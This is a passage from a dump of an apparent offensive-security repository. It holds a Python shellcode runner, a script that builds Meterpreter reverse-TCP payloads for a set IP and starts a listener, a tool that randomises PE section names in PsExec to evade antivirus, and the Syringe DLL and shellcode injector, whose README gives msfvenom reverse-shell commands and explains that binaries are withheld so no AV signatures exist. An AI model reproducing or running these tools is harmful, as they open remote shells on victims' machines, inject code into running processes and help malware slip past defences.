45 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), 46 | ctypes.c_int(0), 47 | ctypes.c_int(ptr), 48 | ctypes.c_int(0), 49 | ctypes.c_int(0), 50 | ctypes.pointer(ctypes.c_int(0))) 51 | # waitfor singleobject 52 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 53 | -------------------------------------------------------------------------------- /pyInjector/pyInjector/shellcode_generate.py: -------------------------------------------------------------------------------- 1 | # quick script that generates the proper format for the shellcode to feed into pyinjector 2 | # generates powershell payload 3 | import subprocess,re 4 | def generate_powershell_shellcode(payload,ipaddr,port): 5 | # grab the metasploit path 6 | msf_path = "/opt/metasploit/msf3/" 7 | # generate payload 8 | proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True) 9 | data = proc.communicate()[0] 10 | # start to format this a bit to get it ready 11 | data = data.replace(";", "") 12 | data = data.replace(" ", "") 13 | data = data.replace("+", "") 14 | data = data.replace('"', "") 15 | data = data.replace("\n", "") 16 | data = data.replace("buf=", "") 17 | data = data.rstrip() 18 | # base counter 19 | print data 20 | 21 | generate_powershell_shellcode("windows/meterpreter/reverse_tcp", "10.250.18.54", "443") 22 | 23 | choice = raw_input("start listener? [y/n]: ") 24 | 25 | if choice == "y": 26 | subprocess.Popen("msfcli multi/handler payload=windows/meterpreter/reverse_tcp LPORT=443 LHOST=10.250.18.54 E", shell=True).wait() 27 | -------------------------------------------------------------------------------- /pyPE_inject_obfuscate/pyPE_mutation.py: -------------------------------------------------------------------------------- 1 | #http://breakinsecurity.com/pe-format-manipulation-with-pefile/ 2 | #32 and 64bit support 3 | import pefile 4 | import string 5 | import random 6 | import os 7 | import mmap 8 | 9 | def cleanterminal(): 10 | ''' 11 | Clean the terminal window and set title 12 | ''' 13 | os.system("cls" if os.name == "nt" else "clear") 14 | os.system("title pyPE_mutator") 15 | 16 | def banner(): 17 | print ">> Obfuscating PE sections" 18 | 19 | def uniqestr(length): 20 | ''' 21 | Create a random string 22 | ''' 23 | return ''.join(random.choice(string.lowercase) for i in range(length)) 24 | 25 | def modify(): 26 | ''' 27 | Path to executables 28 | ''' 29 | input = "PsExec.exe" 30 | output = uniqestr(10)+".exe" 31 | 32 | ''' 33 | Load executable 34 | ''' 35 | originalpe = pefile.PE(input) 36 | 37 | ''' 38 | Parse unmodified sections and replace 39 | the name with random strings 40 | ''' 41 | print "\n[!] Original pe section names" 42 | for section in originalpe.sections: 43 | print "\t[+] "+section.Name.decode('utf-8') 44 | section.Name = "."+uniqestr(4).encode() 45 | 46 | ''' 47 | Write the changes in another executable 48 | ''' 49 | originalpe.write(output) 50 | 51 | ''' 52 | Load new executable 53 | ''' 54 | modifiedpe = pefile.PE(output) 55 | print "\n[!] Modifying pe sections names" 56 | 57 | ''' 58 | Parse modified section names 59 | ''' 60 | for section in modifiedpe.sections: 61 | print "\t[+] "+section.Name.decode('utf-8') 62 | 63 | if __name__ == '__main__': 64 | ''' 65 | Run all the functions 66 | ''' 67 | cleanterminal() 68 | banner() 69 | modify() -------------------------------------------------------------------------------- /syringe/README.md: -------------------------------------------------------------------------------- 1 | # Syringe 2 | 3 | Syringe is a general purpose DLL and code injection utility for 32 and 64-bit 4 | Windows. It is capable of executing raw shellcode as well as injecting 5 | shellcode or a DLL directly into running processes. 6 | 7 | ## Compilation 8 | 9 | Syringe is distributed in source code form only. Compiled binary files are not available. This was a conscious decision in order to prevent AV signatures from being developed. As such, users will have to compile Syringe locally. Syringe is meant to be compiled in Visual Studio 2013, other versions of VS, and other IDEs are not supported. Syringe can be compiled by loading the provided project file (syringe.sln) with VS, specifying the desired architecture, and building. 10 | 11 | ## Usage 12 | 13 | Syringe supports three options for injection (specified with "-1", "-2", or "-3"). The following examples assume the x86 version. 14 | 15 | * DLL injection. 16 | * Using the "-1" option, Syringe can inject an arbitrary DLL into a process specified by a process ID. 17 | * Usage: `syringe.x86.exe -1 ` 18 | * Shellcode Injection 19 | * Using the "-2" option, Syringe can inject specifically formatted shellcode into a specified process. 20 | * Usage: `syringe.x86.exe -2 ` 21 | * Shellcode Injection Alternative 22 | * Using the "-3" option, Syringe can inject specifically formatted shellcode into itself (no PID necessary). 23 | * Usage: `syringe.x86.exe -3 ` 24 | 25 | For information on how to format shellcode for use with Syringe, see the following section. 26 | 27 | ## Formatting Shellcode 28 | 29 | Syringe requires shellcode to be supplied in a base64 encoded format. The following commands can be used on most \*nix systems (with [Metasploit](https://github.com/rapid7/metasploit-framework) installed) to generate the shellcode appropriately. **Be sure to change the "LHOST", "LPORT" and "-p" options accordingly.** 30 | 31 | * x86 shellcode 32 | * `sudo msfvenom -p windows/meterpreter/reverse_https -t raw LHOST=127.0.0.1 LPORT=443 ExitFunc=thread | base64 | awk 1 ORS=''` 33 | * x64 shellcode 34 | * `sudo msfvenom -p windows/x64/meterpreter/reverse_https -t raw LHOST=127.0.0.1 LPORT=443 ExitFunc=thread | base64 | awk 1 ORS=''` 35 | 36 | ### License 37 | Syringe is released under the GPL v3 license, for more details see 38 | the [LICENSE](https://github.com/securestate/syringe/blob/master/LICENSE) file. 39 | -------------------------------------------------------------------------------- /syringe/source/syringe_core.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) 6 | #define REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE 32 7 | 8 | DWORD InjectDLL(PCHAR pDll, DWORD dwProcessID); 9 | DWORD InjectShellcode(PBYTE pShellcode, SIZE_T szShellcodeLength, DWORD dwProcessID); 10 | DWORD ExecuteShellcode(PBYTE pShellcode, SIZE_T szShellcodeLength, BOOL quiet); 11 | DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter); 12 | DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter); 13 | -------------------------------------------------------------------------------- /syringe/syringe.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2013 for Windows Desktop 4 | VisualStudioVersion = 12.0.30723.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "syringe", "source\syringe.vcxproj", "{0B973708-CB34-465F-B20A-11CAB7A3806E}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Debug|Win32.Build.0 = Debug|Win32 18 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Debug|x64.ActiveCfg = Debug|x64 19 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Debug|x64.Build.0 = Debug|x64 20 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Release|Win32.ActiveCfg = Release|Win32 21 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Release|Win32.Build.0 = Release|Win32 22 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Release|x64.ActiveCfg = Release|x64 23 | {0B973708-CB34-465F-B20A-11CAB7A3806E}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | --------------------------------------------------------------------------------